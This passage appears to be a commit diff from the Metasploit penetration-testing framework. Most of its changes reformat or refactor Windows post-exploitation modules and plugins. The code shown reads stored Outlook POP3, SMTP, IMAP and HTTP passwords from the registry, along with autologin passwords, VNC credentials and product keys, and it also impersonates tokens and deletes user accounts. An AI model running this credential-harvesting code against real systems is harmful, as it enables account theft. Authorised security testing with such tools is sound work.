displayname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
email = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Email')
pop3_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Server')
smtp_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Server')
http_server_url = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Server URL')
imap_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Server')
smtp_use_auth = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use Auth')
accountname = get_valdata(k, 'Account Name')
displayname = get_valdata(k, 'Display Name')
email = get_valdata(k, 'Email')
pop3_server = get_valdata(k, 'POP3 Server')
smtp_server = get_valdata(k, 'SMTP Server')
http_server_url = get_valdata(k, 'HTTP Server URL')
imap_server = get_valdata(k, 'IMAP Server')
smtp_use_auth = get_valdata(k, 'SMTP Use Auth')
if smtp_use_auth != nil
smtp_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP User')
smtp_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Password')
smtp_user = get_valdata(k, 'SMTP User')
smtp_password = get_valdata(k, 'SMTP Password')
end
if pop3_server != nil
@@ -136,10 +142,10 @@ class Metasploit3 < Msf::Post
print_status(" User E-mail Address: #{email}")
if type == "POP3"
pop3_pw = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Password')
pop3_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 User')
pop3_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SPA')
smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
pop3_pw = get_valdata(k, 'POP3 Password')
pop3_user = get_valdata(k, 'POP3 User')
pop3_use_spa = get_valdata(k, 'POP3 Use SPA')
smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{pop3_user}")
if pop3_pw == nil
@@ -160,14 +166,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (POP3): #{pop3_server}")
pop3_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SSL')
pop3_use_ssl = get_valdata(k, 'POP3 Use SSL')
if pop3_use_ssl == nil
print_status(" POP3 Use SSL: No")
else
print_status(" POP3 Use SSL: Yes")
end
pop3_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Port')
pop3_port = get_valdata(k, 'POP3 Port')
if pop3_port == nil
print_status(" POP3 Port: 110")
portnum = 110
@@ -186,7 +192,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
@@ -201,9 +207,9 @@ class Metasploit3 < Msf::Post
end
elsif type == "HTTP"
http_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Password')
http_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP User')
http_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Use SPA')
http_password = get_valdata(k, 'HTTP Password')
http_user = get_valdata(k, 'HTTP User')
http_use_spa = get_valdata(k, 'HTTP Use SPA')
print_status(" User Name: #{http_user}")
if http_password == nil
@@ -232,10 +238,10 @@ class Metasploit3 < Msf::Post
print_status(" HTTP Server URL: #{http_server_url}")
elsif type == "IMAP"
imap_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP User')
imap_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SPA')
imap_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Password')
smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
imap_user = get_valdata(k, 'IMAP User')
imap_use_spa = get_valdata(k, 'IMAP Use SPA')
imap_password = get_valdata(k, 'IMAP Password')
smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{imap_user}")
if imap_password == nil
@@ -255,14 +261,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (IMAP): #{imap_server}")
imap_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SSL')
imap_use_ssl = get_valdata(k, 'IMAP Use SSL')
if imap_use_ssl == nil
print_status(" IMAP Use SSL: No")
else
print_status(" IMAP Use SSL: Yes")
end
imap_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Port')
imap_port = get_valdata(k, 'IMAP Port')
if imap_port == nil
print_status(" IMAP Port: 143")
portnum = 143
@@ -281,7 +287,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
modules/post/windows/gather/credentials/vnc.rb
+14 -14
View File
@@ -86,20 +86,20 @@ class Metasploit3 < Msf::Post
def run
'''
Hash format
:name,
:check_file,
:check_reg,
:pass_variable,
:port_variable,
:port,
:hash,
:pass,
:viewonly_variable,
:viewonly_hash,
:viewonly_pass
'''
'''
Hash format
:name,
:check_file,
:check_reg,
:pass_variable,
:port_variable,
:port,
:hash,
:pass,
:viewonly_variable,
:viewonly_hash,
:viewonly_pass
'''
locations = []
modules/post/windows/gather/credentials/windows_autologin.rb
+2 -3
View File
@@ -53,14 +53,13 @@ class Metasploit3 < Msf::Post
creds = Rex::Ui::Text::Table.new(
'Header' => 'Windows AutoLogin Password',
'Ident' => 1,
'Columns' =>
[
'Columns' => [
'Domain',
'UserName',
'Password'
]
)
has_al = 0
# DefaultDomainName, DefaultUserName, DefaultPassword
modules/post/windows/gather/dumplinks.rb
+2 -2
View File
@@ -157,8 +157,8 @@ class Metasploit3 < Msf::Post
lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10)
@data_out += "\t\tVolume Name = #{lvt['name']}\n" +
"\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
"\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
"\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
"\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
end
modules/post/windows/gather/enum_dirperms.rb
+5 -5
View File
@@ -46,11 +46,11 @@ class Metasploit3 < Msf::Post
#p = kern.GetCurrentProcess() #get handle to current process
pid = session.sys.process.open.pid
pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token
if it["return"] #if it fails return 0 for error handling
return it["DuplicateTokenHandle"]
else
else
return 0
end
end
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Post
gen_map = [0,0,0,0]
gen_map = gen_map.pack("L")
#get Security Descriptor for the directory
#get Security Descriptor for the directory
f = adv.GetFileSecurityA(dir, si, 20, 20, 4)
f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4)
sd = f["pSecurityDescriptor"]
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post
next if d =~ /^(\.|\.\.)$/
realpath = dpath + '\\' + d
if session.fs.file.stat(realpath).directory?
perm = check_dir(realpath, token)
perm = check_dir(realpath, token)
if !filter or perm.include? filter
print_status(perm + "\t" + realpath)
end
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post
#get impersonation token
print_status("Getting impersonation token...")
t = get_imperstoken()
#loop through sub dirs if we have an impers token..else error
if t == 0
print_error("Getting impersonation token failed")
modules/post/windows/gather/enum_ms_product_keys.rb
+15 -14
View File
@@ -41,23 +41,24 @@ class Metasploit3 < Msf::Post
"License Key"
])
keys = [["HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654"],
["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574"],
["HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId"],
]
keys = [
[ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId" ],
]
keys.each do |keyx86|
#parent key
p = keyx86[0,1].join
#child key
c = keyx86[1,1].join
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Post
(string_length-1).downto(0) do |s|
t = ((mindex << 8) & 0xffffffff) | product_id[s]
product_id[s] = t / 24
product_id[s] = t / 24
mindex = t % 24
end
modules/post/windows/gather/memory_grep.rb
+7 -8
View File
@@ -17,20 +17,19 @@ class Metasploit3 < Msf::Post
super( update_info(info,
'Name' => 'Windows Gather Process Memory Grep',
'Description' => %q{
This module allows for searching the memory space of a proccess for potentially sensitive
data.
},
This module allows for searching the memory space of a proccess for potentially sensitive
data.
},
'License' => MSF_LICENSE,
'Author' => ['bannedit'],
'Version' => '$Revision$',
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter' ]
))
register_options(
[
OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
], self.class)
register_options([
OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
], self.class)
end
def run
modules/post/windows/gather/reverse_lookup.rb
+7 -7
View File
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => "Windows Gather IP Range Reverse Lookup",
'Description' => %q{
'Description' => %q{
This module uses Railgun, calling the gethostbyaddr function to resolve a hostname
to an IP.
},
@@ -34,12 +34,12 @@ class Metasploit3 < Msf::Post
], self.class)
end
def run
#Add ws2_32 just in case it isn't there...
#Add ws2_32 just in case it isn't there...
session.railgun.ws2_32
#Check if gethostbyaddr is available to us
modhandle = session.railgun.kernel32.GetModuleHandleA('ws2_32.dll')
if modhandle['return'] == 0
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post
return
end
end
#Initialize Railgun 'gethostbyaddr' call'
session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [
['PCHAR', 'addr', 'in'],
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post
iplist.each do |x|
#Converts an IP in string formate to network byte order format
nbi = Rex::Socket.addr_aton(x)
#Call gethostbyaddr
result = session.railgun.ws2_32.gethostbyaddr(nbi.to_s,nbi.size,2)
if result['return'] == 0
modules/post/windows/gather/usb_history.rb
+4 -4
View File
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Post
if isadmin
mace = registry_getkeylastwritetime('HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\' << guid)
if mace
keytime = ::Time.at(mace)
else
keytime = "Unknown"
end
keytime = ::Time.at(mace)
else
keytime = "Unknown"
end
out << sprintf("%25s\t%50s\n", "Volume lpftLastWriteTime", keytime)
end
print_status(info_hash_to_str(out, v))
modules/post/windows/manage/autoroute.rb
+2 -4
View File
@@ -101,14 +101,12 @@ class Metasploit3 < Msf::Post
'Header' => "Active Routing Table",
'Prefix' => "\n",
'Postfix' => "\n",
'Columns' =>
[
'Columns' => [
'Subnet',
'Netmask',
'Gateway',
],
'ColProps' =>
{
'ColProps' => {
'Subnet' => { 'MaxWidth' => 17 },
'Netmask' => { 'MaxWidth' => 17 },
})
modules/post/windows/manage/delete_user.rb
+4 -2
View File
@@ -19,8 +19,10 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Local User Account Deletion',
'Description' => %q{ This module deletes a local user account from the specified server,
or the local machine if no server is given.},
'Description' => %q{
This module deletes a local user account from the specified server,
or the local machine if no server is given.
},
'License' => MSF_LICENSE,
'Author' => [ 'chao-mu'],
'Version' => '$Revision$',
plugins/db_credcollect.rb
+2 -2
View File
@@ -57,8 +57,8 @@ class Plugin::CredCollect < Msf::Plugin
# Target infos for the db record
addr = session.sock.peerhost
# This ought to read from the exploit's datastore.
# Use the meterpreter script if you need to control it.
smb_port = 445
# Use the meterpreter script if you need to control it.
smb_port = 445
# Record hashes to the running db instance
hashes.each do |hash|
plugins/ips_filter.rb
+4 -4
View File
@@ -68,7 +68,7 @@ module SocketTracer
# Hook the write method
def write(buf, opts = {})
if (ips_match(buf))
$stderr.puts "*** Outbound write blocked due to possible signature match"
print_error "Outbound write blocked due to possible signature match"
return 0
end
super(buf, opts)
@@ -78,7 +78,7 @@ module SocketTracer
def read(length = nil, opts = {})
r = super(length, opts)
if (ips_match(r))
$stderr.puts "*** Incoming read may match a known signature"
print_error "Incoming read may match a known signature"
end
return r
end
@@ -95,11 +95,11 @@ module SocketTracer
begin
r = Regexp.new(s[1])
if (data.match(r))
$stderr.puts "*** Matched IPS signature #{s[0]}"
print_error "Matched IPS signature #{s[0]}"
return true
end
rescue ::Exception => e
$stderr.puts "*** Compiled error: #{s[1]}"
print_error "Compiled error: #{s[1]}"
end
end
plugins/lab.rb
+99 -98
View File
@@ -1,5 +1,6 @@
##
## $Id$
# $Id$
# $Revision$
##
$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib', 'lab'))
@@ -14,7 +15,7 @@ class Plugin::Lab < Msf::Plugin
include Msf::Ui::Console::CommandDispatcher
attr_accessor :controller
def initialize(driver)
super(driver)
@controller = nil
@@ -28,12 +29,12 @@ class Plugin::Lab < Msf::Plugin
"lab_help" => "lab_help <lab command> - Show that command's description.",
"lab_show" => "lab_show - show all vms in the lab.",
"lab_show_running" => "lab_show_running - show running vms.",
"lab_load" => "lab_load [file] - load a lab definition from disk.",
"lab_load" => "lab_load [file] - load a lab definition from disk.",
"lab_save" => "lab_save [filename] - persist a lab definition in a file.",
"lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
"lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
"lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
"lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
"lab_load_dir" => "lab_load_dir [type] [directory] - create a lab from a specified directory.",
"lab_clear" => "lab_clear - clear the running lab.",
"lab_clear" => "lab_clear - clear the running lab.",
"lab_start" => "lab_start [vmid+|all] start the specified vm.",
"lab_reset" => "lab_reset [vmid+|all] reset the specified vm.",
"lab_suspend" => "lab_suspend [vmid+|all] suspend the specified vm.",
@@ -48,60 +49,60 @@ class Plugin::Lab < Msf::Plugin
def name
"Lab"
end
##
## Regular Lab Commands
##
##
def cmd_lab_load(*args)
return lab_usage unless args.count == 1
return lab_usage unless args.count == 1
@controller.from_file(args[0])
end
def cmd_lab_load_running(*args)
return lab_usage if args.empty?
if args[0] =~ /^remote_/
return lab_usage unless args.count == 3
return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_running(args[0], args[1], args[2])
else
return lab_usage unless args.count == 1
return lab_usage unless args.count == 1
@controller.build_from_running(args[0])
end
end
def cmd_lab_load_config(*args)
return lab_usage if args.empty?
if args[0] =~ /^remote_/
return lab_usage unless args.count == 3
return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_config(args[0], args[1], args[2])
else
return lab_usage unless args.count == 1
return lab_usage unless args.count == 1
@controller.build_from_config(args[0])
end
end
def cmd_lab_load_dir(*args)
def cmd_lab_load_dir(*args)
return lab_usage unless args.count == 2
@controller.build_from_dir(args[0],args[1],true)
end
def cmd_lab_clear(*args)
@controller.clear!
end
end
def cmd_lab_save(*args)
def cmd_lab_save(*args)
return lab_usage if args.empty?
@controller.to_file(args[0])
end
##
##
## Commands for dealing with a currently-loaded lab
##
##
def cmd_lab_show(*args)
if args.empty?
@@ -112,72 +113,72 @@ class Plugin::Lab < Msf::Plugin
print_line @controller[vmid].to_yaml
else
print_error "Unknown vm '#{vmid}'"
end
end
end
end
def cmd_lab_show_running(*args)
hlp_print_lab_running
end
def cmd_lab_start(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each do |vm|
print_line "Starting lab vm #{vm.vmid}."
if !vm.running?
vm.start
else
print_line "Lab vm #{vm.vmid} already running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
vm = @controller.find_by_vmid(arg)
if !vm.running?
print_line "Starting lab vm #{vm.vmid}."
vm.start
else
print_line "Lab vm #{vm.vmid} already running."
end
end
end
end
end
def cmd_lab_stop(*args)
def cmd_lab_show_running(*args)
hlp_print_lab_running
end
def cmd_lab_start(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each do |vm|
print_line "Stopping lab vm #{vm.vmid}."
if vm.running?
vm.stop
@controller.each do |vm|
print_line "Starting lab vm #{vm.vmid}."
if !vm.running?
vm.start
else
print_line "Lab vm #{vm.vmid} not running."
print_line "Lab vm #{vm.vmid} already running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
vm = @controller.find_by_vmid(arg)
if vm.running?
print_line "Stopping lab vm #{vm.vmid}."
vm.stop
vm = @controller.find_by_vmid(arg)
if !vm.running?
print_line "Starting lab vm #{vm.vmid}."
vm.start
else
print_line "Lab vm #{vm.vmid} not running."
print_line "Lab vm #{vm.vmid} already running."
end
end
end
end
end
end
end
def cmd_lab_stop(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each do |vm|
print_line "Stopping lab vm #{vm.vmid}."
if vm.running?
vm.stop
else
print_line "Lab vm #{vm.vmid} not running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
vm = @controller.find_by_vmid(arg)
if vm.running?
print_line "Stopping lab vm #{vm.vmid}."
vm.stop
else
print_line "Lab vm #{vm.vmid} not running."
end
end
end
end
end
def cmd_lab_suspend(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each{ |vm| vm.suspend }
else
@@ -186,15 +187,15 @@ class Plugin::Lab < Msf::Plugin
if @controller.find_by_vmid(arg).running?
print_line "Suspending lab vm #{arg}."
@controller.find_by_vmid(arg).suspend
end
end
end
end
end
end
end
end
def cmd_lab_reset(*args)
return lab_usage if args.empty?
if args[0] == "all"
print_line "Resetting all lab vms."
@controller.each{ |vm| vm.reset }
@@ -203,18 +204,18 @@ class Plugin::Lab < Msf::Plugin
if @controller.includes_vmid? arg
if @controller.find_by_vmid(arg).running?
print_line "Resetting lab vm #{arg}."
@controller.find_by_vmid(arg).reset
@controller.find_by_vmid(arg).reset
end
end
end
end
end
end
end
def cmd_lab_snapshot(*args)
return lab_usage if args.count < 2
snapshot = args[args.count-1]
snapshot = args[args.count-1]
if args[0] == "all"
print_line "Snapshotting all lab vms to snapshot: #{snapshot}."
@controller.each{ |vm| vm.create_snapshot(snapshot) }
@@ -225,12 +226,12 @@ class Plugin::Lab < Msf::Plugin
@controller[vmid_arg].create_snapshot(snapshot)
end
end
end
end
def cmd_lab_revert(*args)
return lab_usage if args.count < 2
snapshot = args[args.count-1]
snapshot = args[args.count-1]
if args[0] == "all"
print_line "Reverting all lab vms to snapshot: #{snapshot}."
@@ -239,10 +240,10 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
print_line "Reverting #{vmid_arg} to snapshot: #{snapshot}."
@controller[vmid_arg].revert_snapshot(snapshot)
@controller[vmid_arg].revert_snapshot(snapshot)
end
end
end
end
def cmd_lab_run_command(*args)
@@ -250,7 +251,7 @@ class Plugin::Lab < Msf::Plugin
command = args[args.count-1]
if args[0] == "all"
print_line "Running command #{command} on all vms."
@controller.each do |vm|
@controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} running command: #{command}."
vm.run_command(command)
@@ -260,19 +261,19 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
if @controller[vmid_arg].running?
print_line "#{vmid_arg} running command: #{command}."
print_line "#{vmid_arg} running command: #{command}."
@controller[vmid_arg].run_command(command)
end
end
end
end
end
def cmd_lab_browse_to(*args)
return lab_usage if args.empty?
uri = args[args.count-1]
if args[0] == "all"
print_line "Opening: #{uri} on all vms."
@controller.each do |vm|
@controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} opening to uri: #{uri}."
vm.open_uri(uri)
@@ -288,12 +289,12 @@ class Plugin::Lab < Msf::Plugin
end
end
end
##
## Commands for help
##
def longest_cmd_size
commands.keys.map {|x| x.size}.sort.last
end
@@ -332,9 +333,9 @@ class Plugin::Lab < Msf::Plugin
end
end
print_line
print_line
print_line "In order to use this plugin, you'll want to configure a .yml lab file"
print_line "You can find an example in data/lab/test_targets.yml"
print_line "You can find an example in data/lab/test_targets.yml"
print_line
end
@@ -349,18 +350,18 @@ class Plugin::Lab < Msf::Plugin
'Columns' => [ 'Vmid', 'Name', 'Location', "Power?" ]
)
@controller.each do |vm|
@controller.each do |vm|
tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
end
print_line tbl.to_s
end
def hlp_print_lab_running
indent = ' '
indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Running Lab VMs',
@@ -369,19 +370,19 @@ class Plugin::Lab < Msf::Plugin
)
@controller.each do |vm|
if vm.running?
tbl << [ vm.vmid,
if vm.running?
tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
end
end
end
print_line tbl.to_s
end
end
#
# The constructor is called when an instance of the plugin is created. The
# framework instance that the plugin is being associated with is passed in
@@ -427,6 +428,6 @@ class Plugin::Lab < Msf::Plugin
def desc
"Adds the ability to manage VMs"
end
end ## End Class
end ## End Module
plugins/msfd.rb
+2 -2
View File
@@ -104,13 +104,13 @@ class Plugin::Msfd < Msf::Plugin
addr = Rex::Socket.resolv_nbo(client.peerhost)
if opts['HostsAllowed'] and
not opts['HostsAllowed'].find { |x| x == addr }
not opts['HostsAllowed'].find { |x| x == addr }
client.close
next
end
if opts['HostsDenied'] and
opts['HostsDenied'].find { |x| x == addr }
opts['HostsDenied'].find { |x| x == addr }
client.close
next
end
plugins/nessus.rb
+355 -364
View File
@@ -1,16 +1,18 @@
# $Id$
# $Revision$
require 'nessus/nessus-xmlrpc'
require 'rex/parser/nessus_xml'
module Msf
#constants
NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf
Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits.
Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds
class Plugin::Nessus < Msf::Plugin
#creates the index of exploit details to make searching for exploits much faster.
def create_xindex
start = Time.now
@@ -19,50 +21,50 @@ module Msf
count = 0
# use Msf::Config.get_config_root as the location.
File.open("#{Xindex}", "w+") do |f|
#need to add version line.
f.puts(Msf::Framework::RepoRevision)
framework.exploits.sort.each { |refname, mod|
case count
when 0
print("\b\b\b[|]")
count += 1
when 1
print("\b\b\b[/]")
count += 1
when 2
print("\b\b\b[-]")
count += 1
when 3
print("\b\b\b[\\]")
count =0
end
stuff = ""
o = nil
begin
o = mod.new
rescue ::Exception
end
stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
next if not o
o.references.map do |x|
if !(x.ctx_id == "URL")
if (x.ctx_id == "MSB")
stuff << "|#{x.ctx_val}"
else
stuff << "|#{x.ctx_id}-#{x.ctx_val}"
#need to add version line.
f.puts(Msf::Framework::RepoRevision)
framework.exploits.sort.each { |refname, mod|
case count
when 0
print("\b\b\b[|]")
count += 1
when 1
print("\b\b\b[/]")
count += 1
when 2
print("\b\b\b[-]")
count += 1
when 3
print("\b\b\b[\\]")
count =0
end
stuff = ""
o = nil
begin
o = mod.new
rescue ::Exception
end
